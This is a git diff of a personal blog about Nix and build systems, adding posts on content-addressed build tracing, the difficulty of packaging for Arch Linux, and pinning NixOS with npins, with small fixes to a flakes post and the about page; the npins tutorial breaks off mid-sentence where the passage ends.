diff --git a/content/posts/about.md b/content/posts/about.md index d94e758..862ba16 100644 --- a/content/posts/about.md +++ b/content/posts/about.md @@ -9,20 +9,23 @@ isPage = true +++ Hi! -I'm an undergraduate student in Computer Engineering at the University of -British Columbia. +I'm an final-year undergraduate student in Computer Engineering at the +University of British Columbia. -I have done mechanical design for ThunderBots, a RoboCup Small Size League team -building soccer-playing robots. Prior to this, I was on a 4 person team -participating in Skills Canada Robotics, and in my last year of high school, we -had the opportunity to [go to Nationals in -Halifax](/blog/i-competed-in-skills-canada-robotics), where we achieved first -place for Saskatchewan. +In my spare time, when I am not dreaming of all computers landing on the sun, I +work on [NixOS](https://nixos.org) in various places in the project, and a +whole slew of projects you can find on my GitHub profile. I'm most interested +in compilers, operating systems, and build systems. I am a full stack +developer: I can competently write both SystemVerilog and websites, and most +things in between: programming languages are a dime a dozen and I speak a lot +of them, from Rust to Haskell, C/C++, Python, to Fake Haskell That Compiles to +Bash (Nix). I often cosplay (perhaps too successfully) as a build engineer. -Other than robotics, I am most interested in Rust and embedded systems, -especially the security thereof. +When I *am* dreaming of computers experiencing solar destruction, I like +sewing, going on long walks, and cooking. -To contact me, email `jade` at this domain (jade dot fyi). +To contact me, email `jade` at this domain (jade dot fyi) or ping me [on +fedi](https://hachyderm.io/@leftpaddotpy). Jade she/they diff --git a/content/posts/build-systems-ca-tracing.md b/content/posts/build-systems-ca-tracing.md new file mode 100644 index 0000000..769c688 --- /dev/null +++ b/content/posts/build-systems-ca-tracing.md @@ -0,0 +1,249 @@ ++++ +date = "2024-01-27" +draft = false +path = "/blog/build-systems-ca-tracing" +tags = ["build-systems", "nix"] +title = "Build systems: content addressed tracing" ++++ + +An idea I have lying around is something I am going to call "ca-tracing" for +the purposes of this post. The concept is to instrument builds and observe what +they actually did, and record that for future iterations such that excess +dependencies can be ignored if, *even if inputs changed*, the instructions are +the same and the files actually observed by the build are the same. + +# Implementation + +## Assumptions + +This idea assumes a hermetic build system, since we need to know if anything +might have differed from build to build, so we need a complete accounting of +the inputs to the build. It is not necessarily the case that such a hermetic +build system would be Nix-like, however, it is easiest to describe on top of a +Nix-like; first one with build identity, then one that lacks build identity +like Nix. + +This also assumes a content-addressed build system with early cut-off like Nix +with [ca-derivations]. In Nix's case, input-addressed builds are executed, then +renamed to a content-addressed path: if a build with different inputs is +executed once more with the same output, it is recorded as resolving to that +output, and further builds are cut off. + +[ca-derivations]: https://www.tweag.io/blog/2021-12-02-nix-cas-4/ + + + +## Conceptual implementation + +Conceptually, a build is a function: + +> (*inputs*, *instructions*) -> *outputs* + +We wish to narrow *inputs* to *inputsactual*, and save this +information alongside *outputs*. In a following build, we can then verify if +*instructions'* matches a previous build (*instructions*) and if so, extract +the values of the same dynamically observed *inputs'actual*, but +relative to *inputs'* and compare them to the values of +*inputsactual* from the previous build. + +Since our build system is hermetic, if this hits cache, it can be assumed to have +identical results, modulo any nondeterminism (which we assume to be +unfortunate but unproblematic, and is there regardless of this technique). + +## Making it concrete + +A build ("derivation" in Nix) in a Nix-like system is a specification of: + +* Inputs (files, other derivations) +* Environment variables +* Command to execute + +The point of ca-tracing is to remove excess inputs, so let's contemplate how to +do that. + +### File names + +The inputs are files named based on `hash(contents)` in Nix, but we don't +know which contents we will actually access. This is a problem, since the file +paths of *inputs* need to remain constant across multiple executions of the +build (the paths for *inputs* must equal the paths for *inputs'*), since the +part of *inputs* that changed may be irrelevant to this build. + +In a system that doesn't look like Nix, the input file paths might be the same +across two builds on account of not containing hashes, so this would not be a +problem. + +We can solve the file names problem by replacing the hash parts in the input +filenames with random values per-run. These hashes should never appear, even in +part, in the output, if the builder is not doing things with them that would +render the build non-deterministic. + +Unfortunately the file names may appear in the output through the ordering of +deterministic hash tables, for instance, which could be a problem; this exists +in practice in ELF hash tables for instance. Realistically we would need +file-type-specific rewriters to fixup execution output to a deterministic +result following multiple runs. + +We would also have to rewrite those hashes within blocks of data read from +within the builder, but that's *possibly* just a few FUSE crimes away to be +able to do live, on-demand. + +Following the build, the temporary hashes of the inputs can be substituted for +their concrete values pointing to the larger inputs †. + + + +### Tracing, filesystem + +To trace a build, one would have to pull the filesystem activity. This is +possible with some BPF tracing constrained to some cgroup on Linux, so that is +not the hard part. + +The data that would have to be known is: + +* Observed directory listings with hashes +* Read file names matching *inputs*, with associated hashes +* Extremely annoyingly: `fstat(2)` results for all queried files in inputs + (this is extremely annoying because everything calls `fstat` all the time + pointlessly or to check for files being present, and it includes things like + the length of a file, which could *in principle* cause unsoundness if not + recorded). + +This would then all be compared to the equivalent paths in *inputs'* and if the +hashes match, the previous build could be immediately used. + +## Avoiding build identity; how would this work in Nix? + +Nix is built on top of an on-disk key-value store (namely, the directory +`/nix/store`), which is a mapping: + +> Hash -> Value + +Thus, we just need to construct a hash in such a way that both Build and Build' +get the same hash value. + +We could achieve this by modifying the derivation in a deterministic manner +such that two modified-derivations share a hash if they could plausibly have +ca-tracing applied. Specifically, rewrite the input hashes to something like +the following: + +> hash("ca-tracing" + name + position-in-inputs) + "-" + name + +When a build is invoked, modify the derivation, hash it, and check for the +presence of a record of a modified-derivation of the same hash, and then check +if the actually-used filesystem objects when applied to *inputs'* remain the +same. + +# Use cases + +This idea is almost certainly best suited for builds using the smallest +possible unit of work, both in terms of usefulness and likelihood of bugs in +the rewriting. To use the terminology from [Build Systems à la Carte][bsalc], +it is likely most useful for systems that are closer to constructive traces +than deep constructive traces. + +[bsalc]: https://www.microsoft.com/en-us/research/uploads/prod/2018/03/build-systems.pdf + +For example, if this is applied to individual compiler jobs in a C++ project, +it can eliminate rebuilds from imprecise build system dependency tracking, +whereas if the derivation/unit of work is larger, the rebuild might be +necessary anyway. + +# Problems + +* There could exist multiple instances of a modified-derivation with different + filesystem activity, due to, say, a bunch of rebuilds against very + differently patched inputs. This system would have to be able to either + represent that or just discard old ones. +* Real programs abuse `fstat(2)` way too much and it's very likely that this + whole thing might not actually get any cache hits in practice if `fstat` + calls are considered. Without visibility into processes we cannot know if + `fstat` calls' results are actually used for anything more than checking if a + file exists. + + This might benefit from some limited dynamic tracing inside processes to + determine whether the fstat result is actually read. +* The whole enterprise is predicated on generalized sound rewriting, which is + likely very hard; see below. + +## Naive rewriting is a bad idea + +The implementation of ca-derivations itself, where it just rewrites hashes +appearing in random binaries with the moral equivalent of `sed`, is extremely +unsound with respect to compression, ordered structures (even NAR files would +fall victim to this), and any other kind of non-literal storage of store paths, +and this approach just adds yet more naive rewriting that is likely to explode +spectacularly at runtime. + +Naively rewriting store paths is an extension of the original idea of Nix doing +runtime dependencies by naively scanning for reference paths. However, +crucially, the latter does not *modify* random binaries without any knowledge +of their contents, and the worst case scenario for that reference scanning is a +runtime error when someone downloads a binary package. + +Realistically, this would have to be done with a "[diffoscope] of rewriters", +which can parse any format and rewrite references in it. We can check soundness of a +build under rewriting by simply running it more times. The rewriter need +not be a trusted component, since its impact is only as far as breaking your +binaries (reproducibly so), which Nix is great at already! + +In an actual implementation, I would even go so far as saying the rewriter +*must not* be part of Nix since it is generally useful, and it is fundamentally +something that would have to move pretty fast and perhaps even have per-project +modifications such that it cannot possibly be in a Nix stability guarantee. + +[diffoscope]: https://diffoscope.org/ + +# Related work + +This is essentially the idea of edef's incomplete project [Ripple], an +arbitrary-program memoizer, among other work, but significantly scaled down to +be less general and possibly more feasible. Compared to her project, this idea +doesn't look into processes at all, and simply involves tracing filesystem +accesses to read-only resources in an already-hermetic build system. + +Thanks to edef for significant feedback and discussion about this post. You can +[sponsor her on GitHub here][edef-gh] if you want to support her work on making +computers more sound such as the Nix content addressed cache project, tvix, and +also her giving these ideas to Arch Linux developers. + +[edef-gh]: https://github.com/sponsors/edef1c + +[Ripple]: https://nlnet.nl/project/Ripple/ + diff --git a/content/posts/flakes-arent-real.md b/content/posts/flakes-arent-real.md index 20648e0..5d0ceb3 100644 --- a/content/posts/flakes-arent-real.md +++ b/content/posts/flakes-arent-real.md @@ -167,11 +167,12 @@ even if the same package name appears in both. Magic ✨ That is, in the following intentionally-flawed-for-other-reasons `flake.nix`: ```nix -{...}: { +{ + # .... outputs = { nixpkgs, ... }: - let pkgs = nixpkgs.legacyPackages.x86_64-linux; - in { - packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; + let pkgs = nixpkgs.legacyPackages.x86_64-linux; + in { + packages.x86_64-linux.x = pkgs.callPackage ./package.nix { }; }; } ``` @@ -453,6 +454,12 @@ actually invoking `nixpkgs.lib.nixosSystem`. The latter is the much more sinister part, and the reason I would strongly recommend inline modules with closures instead of `specialArgs`: they break flake composition. +That being said, *either* using `specialArgs` *or* an inline module inside +`flake.nix`, rather than an option above, is the only way to inject module +imports. That is, if one uses some option like `imports = [ config.someOption +]`, it will cause an infinite recursion error. We would suggest putting the +imports inside an inline module inside `flake.nix` for this case. + To use `specialArgs`, an attribute set is passed into `nixpkgs.lib.nixosSystem`, which then land in the arguments of NixOS modules: @@ -463,11 +470,11 @@ nixosConfigurations.something = nixpkgs.lib.nixosSystem { specialArgs = { myPkgs = nixpkgs; }; - modules = { - { pkgs, lib, myPkgs }: { + modules = [ + ({ pkgs, lib, myPkgs }: { # do something with myPkgs - } - }; + }) + ]; } ``` diff --git a/content/posts/packaging-is-extremely-hard/antifa-demon-core.png b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png new file mode 100644 index 0000000..ec6c1bd Binary files /dev/null and b/content/posts/packaging-is-extremely-hard/antifa-demon-core.png differ diff --git a/content/posts/packaging-is-extremely-hard/index.md b/content/posts/packaging-is-extremely-hard/index.md new file mode 100644 index 0000000..0a99540 --- /dev/null +++ b/content/posts/packaging-is-extremely-hard/index.md @@ -0,0 +1,256 @@ ++++ +date = "2024-01-27" +draft = true +path = "/blog/packaging-is-extremely-hard" +tags = ["build-systems", "arch-linux", "linux", "nix"] +title = "Packaging is extremely hard, or, why building AUR packages in CI is a nightmare" ++++ + +Packaging on a traditional distribution is challenging to say the least, and I +haven't seen any coherent descriptions of *why* hermetic build systems like Nix +eliminate an entire category of needing to think about certain things. Recently +a friend mentioned she was considering setting up a CI service for some AUR +packages by a trivial cron job, whereas my reaction to the idea of CI for Arch +packages is "that would take a month of work to do correctly". + +Let's explore the inherent complexity in writing a CI service for basically any +binary distro; picking on Arch Linux is only because it is what I have +experience with, though they tend to be especially fast and loose with inherent +complexity. One could argue that Arch in particular is the Go of distros, since +it ignores a lot of hard things in order to ship a working distro, similarly to +[how Go famously solves complexity by ignoring it][golang]. This is not about +factionalism; it is about the choices of where distro maintainers have spent +their energy, and ignoring complexity is something that has its place. + +Arch is known for having a large user maintained repository of non-reviewed +community-written packaging for most anything under the sun called the AUR. +This is a blessing and a curse, because Arch is extremely a binary distro. +Pretty much this entire post would apply to anyone maintaining a binary +repository for another distribution, except perhaps the part of building +packages maintained by other people in CI. + +[golang]: https://fasterthanli.me/articles/i-want-off-mr-golangs-wild-ride + +[rebuild-conds]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#The_workflow +[rebuild-detector]: https://github.com/maximbaz/rebuild-detector + +## "Rebuild conditions are indeterminate", or, why C++ people are always talking about ABI + +If you are a downstream consumer of an official binary package, such as being +an AUR packager, there is not really any obvious notice that you should rebuild +your package due to dependency updates, besides, perhaps, [rebuild-detector] +and upgrading your system regularly. + +The way that release management is done at Arch Linux is that maintainers +updating libraries go and [ping all their colleagues][soname-bump] when their +upstream changed their software so it is no longer binary-compatible +("ABI-compatible"), represented by a "soname bump", e.g. changing the file name +`libc.so.5` -> `libc.so.6`. This is not terribly unusual among distros. + +However, it's perfectly possible that packages break their ABI without updating +their soname, since most changes to C header files besides adding things will +break ABI in theory, for instance, changing `#define` constants or other such +things. So, if upstream is being impolite, they can cause bugs at any time, and +blatant changes can be caught by things like [abi-checker], though they don't +necessarily form part of the official process for Arch. + +[abi-checker]: https://lvc.github.io/abi-compliance-checker/ + +[soname-bump]: https://wiki.archlinux.org/title/DeveloperWiki:How_to_be_a_packager#Run_sogrep_on_identified_soname_change + +When packages are rebuilt without being updated, this is done by incrementing +`pkgrel` in the PKGBUILD, which is achieved automatically in the official repos +with `pkgctl build --rebuild` ([man page][pkgctl-build]) of the affected +packages. For example, for a version `0.20.10-1`, incrementing `pkgrel` would +produce a version `0.20.10-2`, which is uploaded to staging as well as pushed +to the package's own Git repo with `pkgctl release`. + +After all the builds are made, `pkgctl db move` is invoked to move all the +packages over. + + + +[pkgctl-build]: https://man.archlinux.org/man/pkgctl-build.1.en + +### Atomicity? Is that like a criticality incident? + +{% image(name="./antifa-demon-core.png", colocated=true) %} +an antifaschistische aktion sticker with a demon core in the middle, +"ausgerutscht, trotzdem da" on top and "kernphysiker antifa" on the bottom +{% end %} + + + +If the official repos operate by coordination between all the packagers, with a +staging area to atomically release rebuilds, it follows that AUR packagers can +expect that official repos can and will change at any time without notification +(unless one goes and looks at the development bug tracker). + + + +[arch-arm]: https://wiki.archlinux.org/title/Arch_Linux_Archive + +This is a relatively reasonable process for a distro that doesn't fully +automate everything and even one that does, but it is kind of a problem if you +aren't an official maintainer working in the official repos, since you aren't +in the notification list. + +Note also that the information that the AUR itself has on packages is not +sufficient to send emails about this either; this isn't the fault of the +Arch developers. + +However, the upshot of this is that if one is using an AUR package maintained +by someone else, there is no guarantee anyone has tried building it against the +latest versions of the official repos, and it is in fact also impossible to +know what versions it was successfully built against. A local build of an AUR +package can get arbitrarily out of sync with the official repos and it is not +easily possible to reconstruct the state of all the repos that went into +building it. + +Stuff randomly breaking due to repositories using the time of day as a software +version pinning mechanism is not just an AUR problem: it is much, much worse on +third-party binary repositories. For instance, even though [archzfs] is by far +one of the best executed third party repositories, in large part on account of +them running a CI service, it still can be out of time with the versions of the +kernel. + +[archzfs]: https://github.com/archzfs/archzfs + +However, the instance where third party repositories get *really* out of sync +with things is for things like Manjaro which have repositories delayed by two +weeks relative to Arch for "stability". This doesn't work out very well. + +## The source-build-source cycle + +For any package, a CI system that fully automates the packaging workflow needs +to be able to increment `pkgrel` on any dependency updates and trigger a +rebuild automatically. This is stored in the package source files: the CI +system has to be able to push to the sources automatically. + +This also means that a CI system building someone else's AUR packages needs to +*fork any packages it builds*, since it must be able to update `pkgrel` based +on its own detection of upstream changes, without worrying about the AUR +maintainer doing it. + +### Building someone else's stuff? Better reconcile it with automated local changes automatically + +However, the even worse corrolary of the above is if the other maintainer +*does* update `pkgrel`, since then you have to reconcile your own maintained +`pkgrel` and ensure that it strictly increases even with the maintainer's +changes. + +Another cause of needing to rebuild AUR sourced packages is the AUR package +itself changing, perhaps because upstream updated it and the AUR packager +updated their packaging. In that case, one has to discard local changes and +hope that versions strictly increased so pacman will install the new one. + +## Weightless! In the package manager! Loopy dependency graphs + +Debian ([documentedly so][debian-loopy]) and most other binary distros don't +have any tooling preventing packages forming circular build dependency graphs. +The most trivial one that exists in most any binary distribution is the C++ +compiler, which is itself likely a build dependency of the C++ compiler since +both clang and gcc are written in C++. + +How does one get the first compiler? In most distros, the answer is +"someone built it manually from somewhere and shoved it in /usr/local and then +built the first compiler package using some crimes". However, that path is, for +the most part, not documented or clearly reproducible. It is the typical state +of affairs to have the *distro repository itself* be a ball of inscrutable +mutable state. + +In NixOS it's [a tarball of compilers that's built with Nix and is occasionally +updated][nixos-bootstrap-tools], and will in the future [be rooted in a 256 +byte binary][nixos-minimal-bootstrap] after which everything is built from +source, which is what Guix also does. There's a bunch more information about +the efforts to bootstrap from nearly nothing at [bootstrappable.org], as well +as [on the Guix blog][fsb]. + +[bootstrappable.org]: https://bootstrappable.org/ + +[fsb]: https://guix.gnu.org/en/blog/2023/the-full-source-bootstrap-building-from-source-all-the-way-down/ +[nixos-bootstrap-tools]: https://github.com/nixos/nixpkgs/blob/d0efa70d8114756ca5aeb875b7f3cf6d61543d62/pkgs/stdenv/linux/make-bootstrap-tools.nix#L237-L256 +[nixos-minimal-bootstrap]: https://github.com/nixos/nixpkgs/blob/3dcd819caa03c848a9a06964857e12e4b789239e/pkgs/os-specific/linux/minimal-bootstrap/default.nix + +[debian-loopy]: https://wiki.debian.org/CircularBuildDependencies + +## Package tests? p--package integration t-tests?? + +So you want to write an integration test for your package on Arch Linux. That's +too bad, because there's not a testing framework, because there are not tests. +Packages can run the software's testsuite, but there is no officially supported +integration testing solution. + +# Software engineering fixes this + +I have spilled a thousand words on how traditional binary distros (that [are +not Fedora][fedora-ci]) spend a significant amount of labour doing rebuilds +largely by hand, with scripts on their local machines, coordinating amongst +maintainers. Most packages are built on developer machines, though [never on +Fedora][fedora-ci2] and only [sometimes on Debian][debian-ci], and thus cannot +necessarily be trusted to not be contaminated by the squishy mutable stuff that +happens on dev machines. Even though they are typically built in chroots, the +environment is not controlled. + +[debian-ci]: https://ci.debian.net/ + +I have addressed how packages require manually poking `pkgrel` every time a +rebuild is necessary, and how the need for rebuilds affects downstream +builders. This is, incidentally, [largely still true on +Fedora][fedora-updates]. + +The (pessimistic but sound) way to manage rebuilds is to just recompile every +downstream when a single bit of any dependency changes. This is the approach +used by Nix and it trades a significant but not unaffordably large (for a big +distro) amount of computer time in a build cluster for not having to think +about any of this. ABI breaks cannot affect the distribution because everything +was built against the exact same libraries, together. + +A Nix-like hermetic build system doesn't have a concept of `pkgrel`, because +packages are just what is in the single monorepo source tree on a given commit. +There is nothing wrong with the other approach of multiple repositories and +repository metadata that doesn't expose a single history, but it would be +useful to be able to cleanly ensure that a group of machines have exactly the +same packages on them as of some epoch, say. + +Facebook has made a tool for RPM distributions that builds OS images with +Buck2, called [Antlir]. This takes snapshots of repositories and builds OS +images with a hermetic build system, such that they receive the exact same +result every time. + +[Antlir]: https://facebookincubator.github.io/antlir/docs/ + +ABI breaks can *also* not break downstream consumers of `nixpkgs`, because Nix +builds out-of-tree stuff exactly the same using the same version set as +anything else: unlike every binary distribution, the distribution packages are +not special, and building out-of-tree stuff will never randomly break due to +ABI changes. + +NixOS has a robust and widely used (1040 of them) [integration +test][nixos-integration-tests] system, like Fedora, testing most parts of the +system and [gating repository updates][nixos-gating] like Fedora Bodhi. + +[nixos-gating]: https://status.nixos.org/ +[nixos-integration-tests]: https://nix.dev/tutorials/nixos/integration-testing-using-virtual-machines.html +[fedora-updates]: https://docs.fedoraproject.org/en-US/fesco/Updates_Policy/ +[fedora-ci2]: https://discussion.fedoraproject.org/t/report-from-the-reproducible-builds-hackfest-during-flock-2023/87469 +[fedora-ci]: https://docs.fedoraproject.org/en-US/ci/ diff --git a/content/posts/pinning-nixos-with-npins.md b/content/posts/pinning-nixos-with-npins.md new file mode 100644 index 0000000..82f8537 --- /dev/null +++ b/content/posts/pinning-nixos-with-npins.md @@ -0,0 +1,368 @@ ++++ +date = "2024-05-20" +draft = false +path = "/blog/pinning-nixos-with-npins" +tags = ["nix"] +title = "Pinning NixOS with npins, or how to kill channels forever without flakes" ++++ + +> Start of Meetup: "hmm, Kane is using nixos channels, that's not good, it's going to gaslight you"
+> 6 hours later: Utterly bamboozled by channels
+> 6.5 hours later: I am no longer using channels + +\- [@riking@social.wxcafe.net](https://social.wxcafe.net/@riking/112465844452065776) + +Nix channels, which, just like Nix, is a name overloaded to mean several +things, are an excellent way to confuse and baffle yourself with a NixOS +configuration by making it depend on uncontrolled and confusing external +variables rather than being self-contained. You can see [an excellent +explanation of the overloaded meanings of "channels" at samueldr's +blog][samueldr-channels]. In this post I am using "channels" to refer to the +`nix-channel` command that many people to manage what `` points to, +and thus control system updates. + +[samueldr-channels]: https://samuel.dionne-riel.com/blog/2024/05/07/its-not-flakes-vs-channels.html + +It is a poorly guarded secret in NixOS that `nixos-rebuild` is simply a bad +shell script; you can [read the sources here][nixos-rebuild]. I would even go +so far as to argue that it's a bad shell script that is a primary contributor +to flakes gaining prominence, since its UX on flakes is so much better: flakes +don't have the `/etc/nixos` permissions problems *or* the pains around pinning +that exist in the default non-flakes `nixos-rebuild` experience. We rather owe +it to our users to produce a better build tool, though, because `nixos-rebuild` +is *awful*, and there are currently the beginnings of efforts in that direction +by people including samueldr; `colmena` is also an example of a better build +tool. + +Both the permissions issue and the pinning are extremely solvable problems +though, which is the subject of this post. [Flakes have their +flaws][samueldr-flakes] and, more to the point, plenty of people just don't +want to learn them yet, and nobody has yet met people where they are at with +respect to making this simplification *without* doing it with flakes. + +This is ok! Let's use something more understandable that does the pinning part +of flakes and not worry about the other parts. + +[samueldr-flakes]: https://samuel.dionne-riel.com/blog/2023/09/06/flakes-is-an-experiment-that-did-too-much-at-once.html + +This blog post teaches you how to move your NixOS configuration into a repo +wherever you want, and eliminate `nix-channel` altogether, instead pinning the +version of `` and NixOS in a file in your repo next to your config. + +[nixos-rebuild]: https://github.com/nixos/nixpkgs/blob/b5c90bbeb36af876501e1f4654713d1e75e6f972/pkgs/os-specific/linux/nixos-rebuild/nixos-rebuild.sh + +# Background: what NixOS builds actually do + +First, let's say how NixOS builds actually work, skipping over all the remote +build stuff that `nixos-rebuild` also does. + +For non-flakes, `` is evaluated; that is, [`nixos/default.nix`][nixos-defaultnix] in +``. This resolves the `NIX_PATH` entry `` as the first +user-provided NixOS module to evaluate, or alternatively +`/etc/nixos/configuration.nix` if that doesn't exist. For flake configurations, +substitute `yourflake#nixosConfigurations.NAME` in your head in place of +``. + +[nixos-defaultnix]: https://github.com/nixos/nixpkgs/blob/6510ec5acdd465a016e5671ffa99460ef70e6c25/nixos/default.nix + +The default `NIX_PATH` is the following: + +``` +nix-path = $HOME/.nix-defexpr/channels nixpkgs=/nix/var/nix/profiles/per-user/root/channels/nixpkgs /nix/var/nix/profiles/per-user/root/channels +``` + +That is to say, unless it's been changed, `` will reference root's +channels, managed with `nix-channel`. + +Next, the attribute `config.nix.package` of `` is evaluated then +built/downloaded (!!) unless it is a flake config (or `--no-build-nix` or +`--fast` is passed). Then the attribute `config.system.build.nixos-rebuild` is +likewise evaluated and the `nixos-rebuild` is re-executed into the one from the +future configuration instead of the one from the current configuration, unless +`--fast` is passed. + +Once your configuration has been evaluated once or twice pointlessly, it is +evaluated a third time, for the attribute `config.system.build.toplevel`, and +that is built to yield the new system generation. + +This derivation is what becomes `/run/current-system`: it contains a bunch of +symlinks to everything that forms that generation such as the kernel, initrd, +`etc` and `sw` (which is the NixOS equivalent of `/usr`). + +Finally, `the-build-result/bin/switch-to-configuration` is invoked with an +argument `switch`, `dry-activate`, or similar. + +--- + +From this information, one could pretty much write a NixOS build tool: it really is +just `nix build -f '' config.system.build.toplevel` (in old +syntax, `nix-build '' -A config.system.build.toplevel`), then +`result/bin/switch-to-configuration`. That's all it does. + +# Background: what is npins anyway? + +[`npins`][npins] is the spiritual successor to [niv], the venerable Nix pinning +tool many people used before switching to flakes. But what is a pinning tool +for Nix anyway? It's just a tool that finds the latest commit of something, +downloads it, then stores that commit ID and the hash of the code in it in a +machine-readable lock file that you can check in. When evaluating your Nix +expressions, they can use `builtins.fetchTarball` to obtain that exact same +code every time. + +That is to say, a pinning tool lets you avoid having to copy paste Git commit +IDs around, and ultimately does something like this in the end, which hands you +a path in the Nix store with the code at that version. + +```nix +builtins.fetchTarball { + # https://github.com/lix-project/lix/tree/main + url = "https://github.com/lix-project/lix/archive/992c63fc0b485e571714eabe28e956f10e865a89.tar.gz"; + sha256 = "sha256-L1tz9F8JJOrjT0U6tC41aynGcfME3wUubpp32upseJU="; + name = "source"; +}; +``` + +Let's demystefy how pinning tools work by writing a trivial one in a couple of +lines of code. + +First, let's find the latest commit of nixos-unstable with `git ls-remote`: + +``` +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 refs/heads/nixos-unstable +~ » git ls-remote https://github.com/nixos/nixpkgs nixos-unstable | cut -f1 +4a6b83b05df1a8bd7d99095ec4b4d271f2956b64 +``` + +Then we can construct an archive URL for that commit ID, and fetch it into the +Nix store: + +``` +~ » nix-prefetch-url --name source --unpack https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz +0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq +``` + +And finally fetch it from a Nix expression: + +``` +~ » nix repl +Lix 2.90.0-lixpre20240517-0d2cc81 +Type :? for help. +nix-repl> nixpkgs = builtins.fetchTarball { url = "https://github.com/nixos/nixpkgs/archive/4a6b83b05df1a8bd7d99095ec4b4d271f2956b64.tar.gz"; name = "source"; sha256 = "0zmyrxyrq6l2qjiy4fshjvhza6gvjdq1fn82543wb2li21jmpnpq"; } +nix-repl> nixpkgs +"/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source" +``` + +This is essentially exactly what npins does, minus the part of saving the +commit ID and hash into `npins/sources.json`. + +We could write a simple shell script to do this, perhaps called +`./bad-npins.sh`: + +```bash +#!/usr/bin/env bash + +name=nixpkgs +repo=https://github.com/nixos/nixpkgs +branch=nixos-unstable + +tarballUrl="$repo/archive/$(git ls-remote "$repo" nixos-unstable | cut -f1)" +sha256=$(nix-prefetch-url --name source --unpack "$tarballUrl") + +# initialize sources.json if not present +[[ ! -f sources.json ]] && echo '{}' > sources.json + +# use sponge from moreutils to deal with jq not having the buffering to safely +# do in-place updates +< sources.json jq --arg sha256 "$sha256" --arg url "$tarballUrl" --arg name "$name" \ + '.[$name] = {sha256: $sha256, url: $url}' \ + | sponge sources.json +``` + +and then from Nix we can load the sources: + +```nix +let + srcs = builtins.fromJSON (builtins.readFile ./sources.json); + fetchOne = _name: { sha256, url, ... }: builtins.fetchTarball { + name = "source"; + inherit sha256 url; + }; +in +builtins.mapAttrs fetchOne srcs +``` + +Result: + +``` +~ » nix eval -f sources.nix +{ nixpkgs = "/nix/store/0aavdx9m5ms1cj5pb1dx0brbrbigy8ij-source"; } +``` + +We now have a bad pinning tool! I wouldn't recommend using this shell script, since +it doesn't do things like check if redownloading the tarball is necessary, but +it is certainly cute and it does work. + +`npins` is pretty much this at its core, but well-executed. + +[npins]: https://github.com/andir/npins +[niv]: https://github.com/nmattia/niv + +# Fixing the UX issues + +We know that: + +1. `` as seen by `nixos-rebuild` determines what version of nixpkgs + is used to build the configuration. +2. Where the configuration is is simply determined by `` +3. Both instances of duplicate configuration evaluation are gated on `--fast` + not being passed. + +So, we just have to invoke `nixos-rebuild` with the right options and +`NIX_PATH` such that we get a config from the current directory with a +`nixpkgs` version determined by `npins`. + +Let's set up npins, then write a simple shell script. + +``` +$ npins init --bare +$ npins add --name nixpkgs channel nixos-unstable +``` + +You can also use `nixos-23.11` (or future versions once they come out) in place +of `nixos-unstable` here, if you want to use a stable nixpkgs. + +Time for a simple shell script. Note that this shell script uses `nix eval`, +which we at *Lix* are very unlikely to ever break in the future, but it does +require `--extra-experimental-features nix-command` as an argument if you don't +have the experimental feature enabled, or +`nix.settings.experimental-features = "nix-command"` in a NixOS config. (The +experimental feature can be hacked around with +`nix-instantiate --json --eval npins/default.nix -A nixpkgs.outPath | jq -r .`, +which works around `nix-instantiate --eval` missing a `--raw` flag, but this is +kind of pointless since we are about to use flakes features in a second) + +```bash +#!/usr/bin/env bash + +cd $(dirname $0) + +# assume that if there are no args, you want to switch to the configuration +cmd=${1:-switch} +shift + +nixpkgs_pin=$(nix eval --raw -f npins/default.nix nixpkgs) +nix_path="nixpkgs=${nixpkgs_pin}:nixos-config=${PWD}/configuration.nix" + +# without --fast, nixos-rebuild will compile nix and use the compiled nix to +# evaluate the config, wasting several seconds +sudo env NIX_PATH="${nix_path}" nixos-rebuild "$cmd" --fast "$@" +``` + +# Killing channels + +Since building the config successfully, we can now kill channels to stop their +reign of terror, since we no longer need them to build the configuration at +all. Use `sudo nix-channel --list` and then `sudo nix-channel --remove +CHANNELNAME` on each one. While you're at it, you can also delete `/etc/nixos` +if you've moved your configuration to your home directory. + +Now we have a NixOS configuration built without using channels, but once we are +running that system, `` will still refer to a channel (or nothing, if +the channels are deleted), since we didn't do anything to `NIX_PATH` on the +running system. Also, the `nixpkgs` flake reference will point to the latest +`nixos-unstable` at the time of running a command like `nix run nixpkgs#hello`. +Let's fix both of these things. + +For context, *by default*, on NixOS 24.05 and later, due to [PR +254405](https://github.com/NixOS/nixpkgs/pull/254405), *flake*-based NixOS +configs get pinned `` and a pinned `nixpkgs` flake of the exact same +version as the running system, such that `nix-shell -p hello` and `nix run +nixpkgs#hello` give you the same `hello` every time: it will always be the same +one as if you put it in `systemPackages`. That setup works by setting +`NIX_PATH` to refer to the flake registry `/etc/nix/registry.json`, which then +is set to resolve `nixpkgs` to `/nix/store/xxx-source`, that is, the nixpkgs of +the current configuration. + +We can bring the same niceness to non-flake configurations, with the exact same +code behind it, even! + +Let's fix the `NIX_PATH`. Add this module worth of code into your config +somewhere, say, `pinning.nix`, then add it to `imports` of `configuration.nix`: + +```nix +{ config, pkgs, ... }: +let sources = import ./npins; +in { + # We need the flakes experimental feature to do the NIX_PATH thing cleanly + # below. Given that this is literally the default config for flake-based + # NixOS installations in the upcoming NixOS 24.05, future Nix/Lix releases + # will not get away with breaking it. + nix.settings = { + experimental-features = "nix-command flakes"; + }; + + # FIXME(24.05 or nixos-unstable): change following two rules to + # + # nixpkgs.flake.source = sources.nixpkgs; + # + # which does the exact same thing, using the same machinery as flake configs + # do as of 24.05. + nix.registry.nixpkgs.to = { + type = "path"; + path = sources.nixpkgs; + }; + nix.nixPath = ["nixpkgs=flake:nixpkgs"]; +} +``` + +# New workflow + +When you want to update NixOS, use `npins update`, then `./rebuild.sh` +(`./rebuild.sh dry-build` to check it evaluates, `./rebuild.sh boot` to switch +on next boot, etc). If it works, commit it to Git. The version of nixpkgs comes +from exactly one place now, and it is tracked along with the changes to your +configuration. Builds are faster now since we don't evaluate the configuration +multiple times. + +Multiple machines can no longer get desynchronized with each other. Config +commits *will* build to the same result in the future, since they are 